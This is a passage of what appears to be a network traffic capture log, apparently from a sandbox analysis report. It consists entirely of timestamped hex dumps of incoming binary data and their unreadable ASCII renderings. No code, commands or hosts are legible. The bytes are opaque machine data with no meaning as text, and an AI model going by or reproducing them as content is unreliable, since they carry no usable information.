                                                                                                  2021-12-14 15:13:05 UTC63INData Raw: a2 99 e8 96 2e d8 d5 e0 c2 0f 4e 33 56 d6 7c 3a 94 d5 7f 3b 6d de 07 04 2b 48 94 e8 03 8a 79 ed 2b fd 3f 83 b2 2f c4 fa 40 cd 98 8d 6f 7e 3e cf bc 86 d7 7d 74 02 31 d4 42 e9 9f e0 23 05 aa 0b d0 d9 bb 64 e7 9b 02 b9 f1 7e e7 3c 54 6b 35 31 48 de 3f 58 3b bc d2 06 86 d5 2a ff 40 6c c9 11 e9 28 15 74 e1 c7 ac 76 80 2c d0 af 8b 5a d8 25 76 cb c0 38 8d a3 05 b4 30 dc 5b 18 8c b1 b8 e2 aa 82 ed 99 83 bb 21 7f ab 3a 0d 67 a8 1c f7 c3 bd fe 60 c6 08 ed e1 95 b0 d0 d3 12 28 73 53 20 da 04 e6 00 60 cd 94 79 4c 3a 89 79 c3 b9 bc d4 dc 03 49 21 19 20 e9 00 cc c6 18 30 3b 38 2b 70 a6 b0 4d 99 ec 6c 35 67 f3 fd 17 c1 5e dd f6 ef 36 53 88 6d 1a 64 4a 4d f7 01 6f e7 77 09 d3 e6 4b d7 e4 6a 06 7f d2 2b 9b e6 79 e6 9d 26 e8 0c 73 b3 a5 5b 0f 4f d1 0f ff b5 ac fd 7c c4 8d
                                                                                                  Data Ascii: .N3V|:;m+Hy+?/@o~>}t1B#d~<Tk51H?X;*@l(tv,Z%v80[!:g`(sS `yL:yI! 0;8+pMl5g^6SmdJMowKj+y&s[O|
                                                                                                  2021-12-14 15:13:05 UTC64INData Raw: 43 0a 6f 44 a9 e4 c9 3a a5 a7 0c 01 f7 a5 c5 95 07 a5 36 31 da 4d ba 8e c5 38 34 b9 25 31 3f 04 46 f2 1e 69 ea 96 b0 9d c7 cd 8a ec d9 1b 2d 5d bd 32 bf 1a df 63 08 f8 6a 0c 76 03 4b 41 e9 58 7f 5b c6 03 a4 52 c1 82 48 78 1c d2 1f 98 18 10 94 ad 10 05 46 47 49 f7 bf ef 72 76 87 40 53 07 d1 01 c6 68 72 d9 29 6a 35 e9 46 ac ab d4 a4 5a e2 59 f3 d6 fa 67 9a 4d bb 6f 85 2f a1 05 6b 3c 6f f2 cd d5 27 e3 91 7c 00 fe b3 35 88 d0 d4 0d 10 bd 2f 46 39 71 69 fc 00 1e 06 f8 10 af a9 5d 43 c0 5b 27 8a af e9 11 28 97 83 3d d7 8f 10 00 78 86 05 3f ef 8c 76 9c 95 89 44 73 19 1d 9b f9 97 d2 cb d1 66 85 57 05 4b 63 94 7e ab d7 7e 2e bf 6a 91 f3 b5 ad 3a cb 6f 57 f8 d7 81 5e 40 2b 05 4b f6 2d e1 78 83 fa 34 12 6a df bf 02 18 8a a9 b7 90 54 b0 b0 bd 1a 76 3d 36 0b 95 ae ef
                                                                                                  Data Ascii: CoD:61M84%1?Fi-]2cjvKAX[RHxFGIrv@Shr)j5FZYgMo/k<o'|5/F9qi]C['(=x?vDsfWKc~~.j:oW^@+K-x4jTv=6
                                                                                                  2021-12-14 15:13:05 UTC65INData Raw: 99 8e 63 c6 60 3b b5 4f 8b e7 b3 4b 16 d3 d9 62 e3 6f 89 54 58 e0 3a 7d 12 91 1c 82 b4 77 e7 db 5c d8 47 04 4e e8 90 1c f7 d5 e1 ca 23 68 2c fd 0f c7 34 94 df 10 25 77 ee 05 2c 08 4f 94 ee ac ae 79 fc 09 92 b4 82 b8 27 e0 95 cf 7a 9a 6c cf a9 29 ea a4 f1 7c 79 5c ff 3a 09 2d e2 80 b4 a7 a0 1d 03 5f 7d 6a 62 3a 9a f4 c7 e4 7e e7 a1 56 68 2b a0 d9 54 1f 74 35 95 dd b1 91 0f a5 f0 54 7f c2 cc f8 2c 04 e2 f9 d1 bc f3 91 d8 c5 a8 96 52 7a 25 76 c1 fe 38 80 a8 f3 7c 3a cd 51 95 83 87 44 ca b6 35 fb a8 28 bc 35 6a bd c5 26 67 ab 8d 49 f4 c4 ed 7f d5 98 d7 f9 9b be e1 66 1a 39 78 55 19 b4 1f ed 26 ae e9 94 79 da 89 9f 6d d8 70 fc 43 dc 08 41 fa 15 56 64 1d da c6 27 cb dd d7 2a 70 30 b2 43 97 e7 60 68 ed f1 da 30 63 4d 41 e7 f9 08 53 be 6b 18 76 44 4a f8 8a 67 93
                                                                                                  Data Ascii: c`;OKboTX:}w\GN#h,4%w,Oy'zl)|y\:-_}jb:~Vh+Tt5T,Rz%v8|:QD5(5j&gIf9xU&ympCAVd'*p0C`h0cMASkvDJg
                                                                                                  2021-12-14 15:13:05 UTC66INData Raw: af 56 2d cc 68 35 a8 80 d2 1c 00 45 41 8f 6f 2c 79 ab 17 f5 2f 4c 60 d2 eb bc 63 06 d6 43 8b bc fb 8b db 47 34 dd 91 8b 98 01 30 52 06 ec 8f 52 2a 44 60 74 c3 59 eb ea 0d 40 89 47 31 fb fb 1e 3f 6e 90 dd 07 eb 5e be fa 49 63 0d 39 5f 16 57 04 40 7f cc 5e ab 83 98 d5 d8 c2 41 1e de 31 1a 52 75 98 ef cb 54 ea 25 93 f5 85 82 ef ed d2 8b 38 26 86 4f 2c 5b 50 1a e4 e3 45 4e aa be e2 32 d7 44 4a 71 09 b3 7a 8b 59 33 63 37 93 74 41 57 87 cb b7 cf 75 28 4f 33 3a 67 c5 a2 3c ee a8 75 d1 5f 93 8a 4f 81 ce 9b 5b 34 cd fd e7 da 70 9f 54 b9 e0 3a 7d 55 65 1c 82 b4 77 54 de 5c d4 47 04 4e e8 90 5b f0 d7 e1 c6 1e 63 24 37 34 6b 25 9a c2 f2 3c 76 ee 0e 17 49 5a b2 fe 95 9d f5 c3 03 ba 3f 21 a9 0b f8 b4 ef cd 92 e8 67 5f b2 fa af 82 c7 6f 74 44 31 d4 4e c8 af a5 a0 39 27
                                                                                                  Data Ascii: V-h5EAo,y/L`cCG40RR*D`tY@G1?n^Ic9_W@^A1RuT%8&O,[PEN2DJqzY3c7tAWu(O3:g<u_O[4pT:}UewT\GN[c$74k%<vIZ?!g_otD1N9'
                                                                                                  2021-12-14 15:13:05 UTC67INData Raw: 2f 95 fb 77 15 63 21 f7 10 4c 5c 8d b2 0e d3 ca 96 f1 aa a2 b7 7e cb 83 50 13 8e f6 40 fe 84 cc 9b 72 7d 18 99 44 8d 34 63 87 29 2f a6 8d b1 e5 20 c4 5d dc 32 1b 67 e6 c0 3e 5a 9e 98 8c 9d 13 c8 8c d4 80 64 2c 3a b6 fd 29 84 ae 96 82 8c f3 e9 f7 6e c6 96 23 f6 8f 22 0a 98 b9 cc e5 87 6f cd 88 56 8a db 84 bf 3f d7 e6 1b ae 5a 96 55 0b f6 b4 15 e3 93 7f 4c 80 36 36 60 5e 32 b2 81 48 f2 2e 6d a3 78 f9 16 bf 0e 9a 51 86 da fb a5 90 5f 3d e4 3b 33 d3 ab 3c 30 d6 e1 9b 11 b6 a5 c7 2c 15 23 b8 7d 22 4a 13 85 fa 86 ba 4a ee 35 c4 72 bd ec 89 f9 87 bb 9b c9 09 a6 1f 9f bb 80 b7 50 81 56 e4 64 16 eb ed 28 92 16 0c f6 bf d4 7d 17 8c ba 9e cf 97 a0 8a 28 37 33 e9 23 39 2e 03 ce 1d 1b 54 e6 29 6f b3 9f 2a 64 15 cf 3f 3c 58 b7 0c 22 3a 4c 60 08 f8 36 1d 72 03 36 6f 33
                                                                                                  Data Ascii: /wc!L\~P@r}D4c)/ ]2g>Zd,:)n#"oV?ZUL66`^2H.mxQ_=;3<0,#}"JJ5rPVd(}(73#9.T)o*d?<X":L`6r6o3
                                                                                                  2021-12-14 15:13:05 UTC69INData Raw: 8b ca 13 7f 54 20 5a 92 3d 87 ce 23 55 ba ab af f5 7f 44 ea 0b 84 a1 ca 83 c6 74 f9 8a 84 a5 49 80 32 de ad d8 9b cd 9a 7f be 56 55 0e a6 46 40 9c 76 2a 79 ad 09 f6 9f 64 40 d2 f8 90 0c 47 c0 52 99 26 d5 83 d2 c8 21 b2 d0 9f b0 ab be e5 24 d2 d4 52 20 4c 5e 8f ca 50 6f 75 a7 26 89 4d 1d 51 4c c8 37 f3 28 e4 1e c2 32 b0 eb 49 1d 1c 57 7d 1d 7a 2f 42 74 97 15 ae 83 94 a9 c8 d2 48 03 9d 1a 30 43 6e 86 ce b2 3f c0 22 fc e6 9b 9a 68 ff 16 8b 39 35 9d 47 be 79 86 09 f2 e1 54 51 88 e5 fa aa 78 ba 79 67 22 f0 7a 9f 5c 05 78 19 0c e4 30 58 93 ca b1 d4 6a 3b dc 25 3f 71 da 99 08 fe 8a 69 d1 41 0e bf 20 a6 ce 39 40 07 d0 c4 4c b5 58 94 7c e9 f1 33 18 56 8e 1d 88 b5 58 83 c9 5f 50 d8 4f 62 e9 9a 3e cb d2 c9 d2 0e 74 39 f0 20 13 23 95 d5 75 37 7e e4 d1 11 4a 63 a3 e8
                                                                                                  Data Ascii: T Z=#UDtI2VUF@v*yd@GR&!$R L^Pou&MQL7(2IW}z/BtH0Cn?"h95GyTQxyg"z\x0Xj;%?qiA 9@LX|3VX_POb>t9 #u7~Jc
                                                                                                  2021-12-14 15:13:05 UTC70INData Raw: 35 53 08 7a e2 fa d0 f1 39 70 e7 e8 ff 48 98 d9 15 63 55 55 f7 b5 84 e1 68 10 cf 6b 5e c7 2d 6d 14 f2 c7 3d 81 c2 ae a4 9e 09 c0 1a 53 46 8d 75 0d d3 c6 05 c8 9a ba 61 67 1d 9e 73 43 59 e5 41 e7 e0 ca 8a 43 ad 3b 1e d9 9a ee 74 50 b4 10 a6 8d b0 c6 24 98 24 ca 29 17 f3 f7 c6 44 f4 9f 8f bf 9c 04 c1 97 63 97 af 77 96 b7 fd 29 a5 e9 65 0d 3b e1 3d e8 9c ad 44 ae cf a7 5f 0f 8b b3 ec 65 95 63 dd f3 24 3c f3 98 d1 c2 dc ee 07 b7 7e e0 df bc f8 12 dd cf 85 78 64 1c 21 3a 77 21 c2 a7 92 4e 94 5d db ab fc 46 0e 07 03 14 e0 b9 80 e8 73 1b 48 ab e7 3a 26 a5 40 34 be 6b 99 bc 03 a7 bc c2 2f 73 36 bd 6a 07 dc cd 8c ed a3 b8 41 ff 3e a0 54 28 8d 1d 87 77 ad 4d d0 0c 9f 90 8a aa b7 7d c2 80 d8 55 5b 5a ff 3b a3 de ea 0d f7 a6 bd 96 07 89 3e 21 ff cf b7 98 3d 11 9b bf
                                                                                                  Data Ascii: 5Sz9pHcUUhk^-m=SFuagsCYAC;tP$$)Dcw)e;=D_ec$<~xd!:w!N]FsH:&@4k/s6jA>T(wM}U[Z;>!=
                                                                                                  2021-12-14 15:13:05 UTC71INData Raw: f6 f9 79 0e 5a 61 ea df bb c7 60 15 33 1d f0 f4 a3 2a 2e cd 7e 53 c4 9a 91 76 e5 44 b7 40 de bb f5 86 88 83 ec 11 7b dc 86 49 15 9b a5 b7 22 57 b0 b0 d2 e6 75 2b c2 65 ac a9 c7 8c 59 d2 af c3 86 a5 4b 61 a1 0a af 50 2a cb 51 c6 b1 81 d8 2f b7 52 56 59 6d 37 79 b1 11 6d a6 fb 5f 6e 06 65 8d 31 ca 45 4b 23 ce 9a d1 57 85 f2 e9 61 4f 50 36 78 0c c4 d4 42 2a 4e 48 9e f7 58 2f c1 db 4d 93 4d 19 de e8 2e 33 7d b0 ce 08 c3 a4 ba fa 5e 1a 07 30 67 09 78 25 51 70 f5 3b b0 92 60 bb ed cf 50 12 ef 0d 66 42 64 97 d8 b7 43 e2 23 ed e4 9f 7c e4 f8 1f 9a 3f 3e 88 32 af 4e 95 01 f3 e3 59 46 67 ee df 2e de 95 42 79 6c 66 74 92 59 1c 72 01 8a 4b d0 71 a9 c0 af 53 50 3f c2 35 29 60 dd a2 16 ff 9b 6b df 46 e1 b4 63 86 d9 2a 4c 09 d6 c6 41 da 61 9d 63 e8 1e 3b 5b 7a 9e 1a 8f
                                                                                                  Data Ascii: yZa`3*.~SvD@{I"Wu+eYKaP*Q/RVYm7ym_ne1EK#WaOP6xB*NHX/MM.3}^0gx%Qp;`PfBdC#|?>2NYFg.BylftYrKqSP?5)`kFc*LAac;[z
                                                                                                  2021-12-14 15:13:05 UTC72INData Raw: 33 e3 22 86 c7 80 87 d6 21 8f 66 c9 d5 e0 4a cd 0e 39 3c 04 5a 7f 62 71 d9 16 1a a4 27 31 58 81 a1 4a 8c cb e6 4d fb e4 d2 b6 d1 48 4b ec f7 33 6a 25 f1 0b 69 7d c9 e5 9d 78 c8 d6 1a c5 70 56 d8 d3 51 10 e3 c9 15 23 f2 6f 7a 8b 09 c6 1a 53 46 88 5c 09 de 1d 92 e1 a2 ba 66 1e 4e 93 5b 02 4b e1 5a eb a7 8e 8f 43 a1 7e 90 f2 9a e8 59 56 a2 1d 7b f0 b1 f6 24 c3 48 ce 54 85 f2 f7 c1 48 1e 84 80 8e 9c 3c 8d 03 63 97 af 00 3d b2 eb 4c 26 9b 9e 0a 28 ed 19 a7 b5 d1 4a bf cd 9e 27 1c e4 3c c5 f3 90 0c 43 80 d8 37 e0 95 b6 17 c0 ed 0d b9 47 98 f3 9b fe 3a a8 e3 aa 7e 4c 80 1b c6 71 52 3e b7 95 6c fc a0 da 80 e5 46 37 73 3e f8 e6 91 00 fd 7b 09 48 aa e0 3a 26 c0 31 32 be 61 f7 55 16 b3 9e 69 07 0d 38 a9 44 f6 5e c9 8a fd 06 29 42 ff 39 c7 bc 3d a5 b4 e8 8a a6 65 46
                                                                                                  Data Ascii: 3"!fJ9<Zbq'1XJMHK3j%i}xpVQ#ozSF\fN[KZC~YV{$HTH<c=L&(J'<C7G:~LqR>lF7s>{H:&12aUi8D^)B9=eF
                                                                                                  2021-12-14 15:13:05 UTC74INData Raw: df 7b 84 9b be f8 9d a3 94 94 24 8d 8d 10 00 ed f8 ba 21 e6 99 3a 13 92 94 49 41 88 ed 9b f9 86 5d cb cd e3 9d 4c 3b c6 76 f5 d1 a6 f7 e1 3d ba 19 6c e3 bb b8 24 ed af 52 d0 8e 19 4f 48 5b b9 6a 39 27 f5 86 1e fd c4 0c 74 c5 a1 c4 0d 84 b0 c8 3d 24 2c ab a7 fb 66 0b 16 0a 84 ab 5b 9b 46 dc 95 f2 fa 39 5c 00 9a 1b b0 0d b0 cb 4e b6 bd 9f ba b9 b7 48 5e 9a 61 1b f4 b4 0e 67 3e 6c b5 d3 f8 9a ee 31 ce 4d 8a 10 3f 8b db 46 0a dd b9 80 a8 8f eb 52 0c c4 49 43 24 51 51 81 a6 c5 f0 cc c6 5b a9 eb 19 df fb 82 24 73 80 d7 17 88 ae ab f4 50 10 34 eb 5f 1c 7a b9 40 7e fb 2e b0 d9 02 ab cf dc 5f 0f 6e 22 3f 5c 7b 88 94 39 41 e4 2e e3 fc 09 a9 e5 d4 17 98 36 37 99 4f 13 ca 86 09 f3 6e 40 56 8e f0 fc b8 de 9c 41 79 4a 66 7a 95 53 34 bc 10 82 53 b2 61 8b d1 ae a9 e7 2e
                                                                                                  Data Ascii: {$!:IA]L;v=l$ROH[j9't=$,f[F9\NH^ag>l1M?FRIC$QQ[$sP4_z@~._n"?\{9A.67On@VAyJfzS4Sa.
                                                                                                  2021-12-14 15:13:05 UTC75INData Raw: a5 c2 38 82 e4 81 e1 ab 0a 68 ae c6 ba 76 af 02 f4 fa 13 fe 69 df 6a fd ca 98 b8 f6 7c 14 a6 c4 a0 6a dd 1b e7 26 08 7a ba 6d ca 26 8e 6f d5 58 ee 64 c9 10 7c 37 0b 5a 7c 0a 35 d8 3a 35 a8 2e 03 64 3b a1 40 91 39 64 9f 76 c9 fa 08 d0 43 43 e0 fe 2e cc 29 9e 50 63 55 55 e6 13 c9 ce 49 0e ef 66 57 d0 f2 69 ee e2 ef 2e 9c fe 6f 73 9a df f6 36 51 5b a8 5b 06 cf 3e 09 cc a0 91 63 46 40 95 71 04 58 fe 7b e6 8f 2c 8a 43 a7 b1 17 f3 8b 9d ce 51 a4 1a ad 92 ac de 9f d5 59 c0 31 0b db 57 c3 5f c2 bf 31 9d 99 0e b2 14 61 97 b4 09 25 d8 ea 21 af 90 b3 00 13 4a 35 e0 b2 f9 58 ac c9 85 25 21 82 9d 66 f7 96 65 b4 99 da 3d f9 81 b2 29 ce e5 35 23 57 9e db ad f2 2b a9 51 96 7a 5d 8e 4d 20 73 52 34 b5 9c 52 e8 ad e2 d8 f7 4e 26 6a 09 05 eb 0b 13 ea 62 1b 0f b1 e5 3a 2a fe
                                                                                                  Data Ascii: 8hvij|j&zm&oXd|7Z|5:5.d;@9dvCC.)PcUUIfWi.os6Q[[>cF@qX{,CQY1W_1a%!J5X%!fe=)5#W+Qz]M sR4RN&jb:*
                                                                                                  2021-12-14 15:13:05 UTC76INData Raw: e3 3d 6f f2 b1 c6 38 d0 e8 6a 00 fe b8 0d d0 d4 d4 0b 4f 0d cf 57 32 c6 62 e5 0c 17 0e d9 02 bc 97 65 9d c2 7b 27 9b af d0 96 b2 9a 80 06 33 eb 11 00 7b fd a3 16 7d 87 65 85 ec 8d 57 4b a2 15 45 eb ae f6 da c3 f6 be 7d 0e 5a 61 f1 e6 92 d7 74 37 64 19 f6 d8 b5 a7 28 dd 7e 52 d0 8e 85 5e 5c 5e b7 58 ec 27 f5 87 99 dc ce 13 58 da 97 58 3c 8a af c9 0a c2 b0 ba a3 e6 63 3d e0 98 85 ab cd e5 5f c2 87 e7 8e 7b 41 26 b2 08 af 5c 04 e2 40 a9 a3 5e d8 23 8c 46 40 9f 7e 23 68 a5 00 78 3d 59 60 df e2 9a 72 21 de 50 b5 2c c6 8b d1 6c 85 fc b4 9f 12 ad 30 52 af c4 d5 43 3c 43 70 0a c0 59 e1 c2 d0 5e 91 b3 18 f3 f3 26 b9 7f 9f cc 17 da 3f ba f3 50 02 ea 39 73 12 aa 05 51 70 e6 1b bb 83 9e b0 cd dc 4e 19 f2 3a 2e 52 9a 96 eb ab 80 c8 23 fc ee ac 96 e5 d4 1c 87 27 34 9a
                                                                                                  Data Ascii: =o8jOW2be{'3{}eWKE}Zat7d(~R^\^X'XX<c=_{A&\@^#F@~#hx=Y`r!P,l0RC<CpY^&?P9sQpN:.R#'4
                                                                                                  2021-12-14 15:13:05 UTC77INData Raw: ee 47 7f 35 ff e9 28 15 e9 e0 c0 b6 6b b9 ac c1 0e 52 7a 54 25 76 cb 5c 3a ba bd 25 47 30 dc 5b 8c 9d b6 b4 d4 33 a9 f6 99 18 bd d8 60 98 49 89 7d af 04 e8 1d 1f d2 62 d1 9f fc e1 92 44 f1 46 10 03 71 e4 d2 df 60 85 20 86 c9 be 5b d2 28 f3 0e cf a6 eb 62 cd 04 56 3f 36 58 75 39 cb d9 16 16 ae 38 3a 66 31 8a 51 86 e4 64 b7 fa ce f8 10 da 48 46 f1 16 28 6e 9c e6 00 63 52 47 1f 9c 52 e2 43 18 ee 99 58 ab 92 7e 10 e7 e9 0e 86 f0 12 13 8c 21 f3 30 53 4c a5 48 3f d1 c0 20 e0 a2 ba 67 6d c3 83 4d 0f 73 fe 4b e8 98 23 8a 6f a5 09 1c f3 9d f8 8a 50 88 12 b1 86 b0 f1 3c 2b 58 e6 39 26 f1 dc 24 5d bf fd 8f 9d 9d 2e e3 00 60 ea d4 04 2c b3 d7 23 af 9a 8d 3c 39 eb 19 e0 b4 d1 46 ae c9 9e 34 00 a0 ae c4 f4 81 9d da ac da 25 f8 92 b9 29 23 ef 21 bd 41 95 db bb e6 c4 a3
                                                                                                  Data Ascii: G5(kRzT%v\:%G0[3`I}bDFq` [(bV?6Xu98:f1QdHF(ncRGRCX~!0SLH? gmMsK#oP<+X9&$].`,#<9F4%)#!A
                                                                                                  2021-12-14 15:13:05 UTC79INData Raw: 7e 0e 53 61 f3 ad 46 bf 68 78 f5 55 4c 37 ec 54 65 aa d4 aa d2 f3 40 eb bb f6 65 9a 6f 93 38 81 be a7 6a ca 2b 64 d3 74 c4 39 ed 11 41 2c fc a1 16 d0 d3 c2 f5 7e 21 2c 51 38 d3 7f fd f2 17 39 eb 2d be 92 86 9f b9 21 27 9b ba d2 37 b0 99 a2 15 1b 8d 1a 7d 0b e9 b4 3a c5 86 65 9c b3 99 56 38 a8 1f 9b f9 86 c1 da c1 d4 81 53 0c 50 64 d6 c5 82 ea 71 3d bc 6a d6 f0 b5 ad 53 cf 0d 03 d1 8e 83 31 05 45 b7 4c f4 24 dd c7 87 ec cc 7c 53 d8 97 52 73 b1 ae d8 24 57 df f8 a8 e4 71 28 e0 34 81 ab c1 e5 60 c1 87 e7 eb f6 4c 0e 83 0a c0 14 2d da 46 aa 81 bf dd 25 a0 29 69 8d 7e 29 07 f0 01 78 2e 4e 0f 91 f9 9a 74 23 e8 12 98 30 c2 e4 f3 44 96 c6 d8 c8 b1 af 36 78 12 d7 e5 50 2a 66 48 9e c2 51 e1 c2 c8 57 82 66 02 df fc 09 cb 7c b3 ce 10 c8 32 bd ec b1 0d 38 3a 48 17 7a
                                                                                                  Data Ascii: ~SaFhxUL7Te@eo8j+dt9A,~!,Q89-!'7}:eV8SPdq=jS1EL$|SRs$Wq(4`L-F%)i~)x.Nt#0D6xP*fHQWf|28:Hz
                                                                                                  2021-12-14 15:13:05 UTC80INData Raw: 44 e4 80 28 a8 34 8a d8 d1 ca bc e9 e6 96 02 f2 f1 7e e7 3c 43 70 3d 66 f2 44 33 40 1d 00 55 18 99 9d 2a e8 58 7c f6 a8 75 2e 0a e2 ef fe 2a 6f a6 bb de a2 0c 7c 41 29 69 a9 c0 2f 95 b2 38 f3 36 c3 55 a4 40 b6 a5 c2 a4 84 f2 96 00 8c ba 67 ab 5b b1 90 af 03 fe 7f 18 e1 71 d9 f3 60 e0 95 a8 d0 eb 12 28 73 53 37 c2 08 f4 bc 80 d2 80 59 37 2b 8e 66 53 a0 f0 5d ed b6 56 2c 06 c6 73 0e dd c6 05 8c a8 27 3c 50 9f a1 4a 86 7f 75 56 e3 c2 4a 08 d1 48 dd e1 f7 30 5d e7 6d 0d 7c 4f 7f 0f 9d 7e e0 f4 1c da 61 45 9f 67 78 0f ff dc 23 18 f5 70 67 93 60 6b 1c 4c 52 ba 4e 93 d5 df 17 c0 4f ba 61 6d 5f 94 44 24 47 9e d7 e9 90 fc 94 57 3b 17 08 d1 ba 62 74 51 a4 8c a0 92 93 d6 c1 d5 59 ca a7 0b ec d3 d8 14 58 91 90 b8 86 42 5d 04 7c b1 a1 09 b0 b1 e2 04 8f 5b 9e 0c 3b 77
                                                                                                  Data Ascii: D(4~<Cp=fD3@U*X|u.*o|A)i/86U@g[q`(sS7Y7+fS]V,s'<PJuVJH0]m|O~aEgx#pg`kLRNOam_D$GW;btQYXB]|[;w
                                                                                                  2021-12-14 15:13:05 UTC81INData Raw: cc 06 61 15 2b f1 fa 50 6a 5b cf 85 bf 43 ca 9c 57 9f 0c e7 16 f7 23 16 85 af a2 78 f7 43 4f 9e 27 58 76 7c 23 4a 62 7f ae 3d c0 07 50 f3 7f 68 2a e2 3a 17 aa c5 a5 e7 fe be ea 84 ef 76 9d 41 82 30 1b 07 10 6e db 3b 47 40 6b c4 38 ec c7 2f 01 fe bf 35 b6 d5 d4 01 57 60 2f 46 35 bc 5e e7 0c 10 0a e7 15 b7 b9 74 96 df a5 26 b7 b8 fe 12 bb 84 99 0f 1b 9c 1b 18 8f e8 98 34 ed ae f0 8f 83 90 5a 52 bb 14 9b e8 8d dd 24 c2 d0 87 42 09 72 d3 ff ce ac ff 00 3d ba 13 e3 f4 a8 b4 22 cd 6f 59 cb 70 84 72 54 4c 9f f9 f2 27 f3 ae f6 ec ca 19 6c 40 84 5d 00 99 a4 d8 33 5e af b4 57 e5 5b 3b d9 0d ac 12 c3 8a 4e ac ad ef 84 a3 52 01 96 03 af 47 27 cc be a8 85 83 cf 36 ad 46 50 84 61 31 96 a4 2c 7a 03 49 58 f4 06 65 8d 29 ea 52 8e 00 c1 8b 92 46 96 cc 1c 9f b0 be 26 5e 27
                                                                                                  Data Ascii: a+Pj[CW#xCO'Xv|#Jb=Ph*:vA0n;G@k8/5W`/F5^t&4ZR$Br="oYprTL'l@]3^W[;NRG'6FPa1,zIXe)RF&^'
                                                                                                  2021-12-14 15:13:05 UTC82INData Raw: 91 dd ee 1c a9 45 9a e3 cf fe 3a a2 cb 94 7a 5b 74 23 16 72 4a 2d a2 92 55 ff b9 24 aa da 5e 24 6c 68 20 e4 91 0a c4 46 1f 60 37 ef 20 33 d2 bc 24 ba 79 08 40 2e b7 b4 dc 68 39 30 bd 66 07 68 cb 8c e1 81 37 51 fb 38 c2 ac 33 73 16 c4 91 8c b2 da 04 b7 14 94 c8 b6 83 61 27 d8 53 73 ad dc c4 a5 ad 16 53 96 a1 c9 78 02 89 25 2d c1 b3 b2 b4 38 2e 0b bf 32 2d 3b 16 a4 0d 33 47 c3 bf 9e 2e b9 18 75 08 ee 32 2d b6 a4 02 b6 b5 b3 60 19 fa 9e 9f 76 12 32 ed c1 76 75 51 d6 98 91 72 c2 fd c8 61 0d c1 1f ce 0a 10 94 ad 2e 63 40 6c 40 9c 71 7d 72 7c 2f 47 62 3e af 3d cc 7e 4b fa 57 40 37 ef 2f 16 77 7b ac f8 f3 43 f8 af b5 db 9a 47 99 33 90 28 b4 7b cd 2e 7f e9 7e ab f7 fa ef 4a 13 ec 92 03 c1 c5 c5 1b 10 ec 2f 46 39 c0 73 e2 1e 1d 3d df 04 bc b3 0a 51 c2 5b 2d 8a ae
                                                                                                  Data Ascii: E:z[t#rJ-U$^$lh F`7 3$y@.h90fh7Q83sa'SsSx%-8.2-;3G.u2-`v2vuQra.c@l@q}r|/Gb>=~KW@7/w{CG3({.~J/F9s=Q[-
                                                                                                  2021-12-14 15:13:05 UTC83INData Raw: 1b f3 30 ba d2 4f 0c 14 89 5f 1c 6b 33 5a 5b ff 33 a8 94 60 bb ed c1 59 1f f2 34 27 bd 65 bb c5 b2 5b ea 24 e4 12 85 ae e7 ff 14 a0 db 24 ec f5 33 52 82 23 d1 f0 52 25 35 ef f3 20 e5 92 59 66 31 ca 68 9b c5 14 72 10 30 53 2e 61 93 c6 89 a4 7b 3f c2 34 33 70 3a b0 32 fd 92 6e c0 41 07 4b 4e ad c2 3a 48 6d 1f d5 49 de fe 22 4d f7 f9 37 77 74 96 e3 83 92 5b 96 f5 46 d3 6f 29 54 16 9b 18 c1 d6 e2 de d9 78 38 ca 6e 7b 36 ef 13 7f 3b 72 60 b8 13 b5 7a 9f fe ae 91 74 fc 0a a1 c0 82 94 34 ee e7 87 cd 92 e6 7f ee 1e 45 af 82 c6 26 7c 75 31 d4 44 ca 98 b3 84 32 a7 0b d8 dc 42 74 cc 8f 35 47 f1 77 fb 5e 44 40 20 05 6c 69 aa 58 34 4a 58 01 8e e4 05 ed 59 a3 c3 d5 fa 18 13 e8 43 c1 b6 69 0a b0 c1 b9 86 69 57 1d 93 cb 5c 29 8a ae 2c 77 ce dd 77 8e 99 a1 73 3c 33 80 ed
                                                                                                  Data Ascii: 0O_k3Z[3`Y4'e[$$3R#R%5 Yf1hr0S.a{?43p:2nAKN:HmI"M7wt[Fo)Tx8n{6;r`zt4E&|u1D2Bt5Gw^D@ liX4JXYCiiW\),wws<3
                                                                                                  2021-12-14 15:13:05 UTC85INData Raw: be 0e 51 65 fd 23 ab 85 b4 1f 34 eb 20 ef ab fd be af e5 cc 20 70 42 b5 c4 f7 9e 72 df 56 57 16 f3 92 bc 17 98 ec 0d b5 54 e5 1d bc fe 3e a4 b8 bb 7c 4c 80 33 3f 02 6d 3c a6 98 6c bb a2 da a1 de 0f 24 7b 0d 1d f0 07 b7 83 60 1c 60 37 99 e8 20 d6 b8 2a 93 72 f9 41 13 a8 a9 dd f9 0c 1e b6 77 a2 cc c9 8c ea 86 31 5a ec 37 d3 b9 26 92 54 16 8b 80 5d cc 15 bc 3a cf a8 b1 5f 52 8a cb 5f 6c 88 ef 34 a5 bc 19 13 b3 52 d3 47 0f b1 1c 21 d7 4d ac dd 28 36 18 aa 3d 23 7f f3 5b 20 16 7d e2 b7 b5 a5 af 73 66 1c de 20 22 42 aa fc b7 36 82 62 0b 8b de 0e 76 18 26 91 9a 67 77 51 d6 a6 ff 50 c1 89 4a 65 15 13 7a a0 26 10 9e 8f 78 52 42 4d 67 d9 0d ee 78 64 4a d5 4b 10 a9 37 d9 65 6b fe 7f 7f 3a f0 11 e2 ab f8 a7 c0 36 be 14 57 d9 5e 89 48 93 29 8e 36 59 6b f7 0b 6d fb 1c
                                                                                                  Data Ascii: Qe#4 pBrVWT>|L3?m<l${``7 *rAw1Z7&T]:_R_l4RG!M(6=#[ }sf "B6bv&gwQPJez&xRBMgxdJK7ek:6W^H)6Ykm
                                                                                                  2021-12-14 15:13:05 UTC86INData Raw: a0 db 46 94 e4 f2 9d b0 a5 32 29 ca c4 d5 56 2c 3d 76 9c c2 53 f0 c7 aa 7e 8b 4d 13 f7 bb 1c 35 77 96 da 9e b0 0d b8 fa 45 24 54 3a 5f 16 52 64 53 70 ee 3a b8 15 29 d5 d2 c2 41 1e 8f e0 31 43 60 88 f2 b6 5f ea 32 f3 f3 b6 7c e4 f8 1f b3 5e d8 68 a6 2c 61 95 06 f3 e3 5e 47 ae 11 f2 08 b8 90 22 af 22 fa 6f 93 5b 10 a4 9f a9 53 2e 72 ad 8c b0 de 71 3d b9 f2 3a 67 c0 b7 6d c1 88 63 ca 59 1a c6 70 83 cf 33 62 56 db d5 43 d3 66 03 0f dc e2 3a 7d 55 cf 1f 82 b4 56 97 49 2f e1 6d 20 44 c0 da 36 d8 df e8 d8 99 07 0c e3 27 76 1c d4 d7 7f 31 7f f7 99 77 50 49 94 e2 ac ca 7b fc 09 92 7f 81 b8 27 e5 86 d7 7a fd f1 79 7f 34 b8 79 82 c6 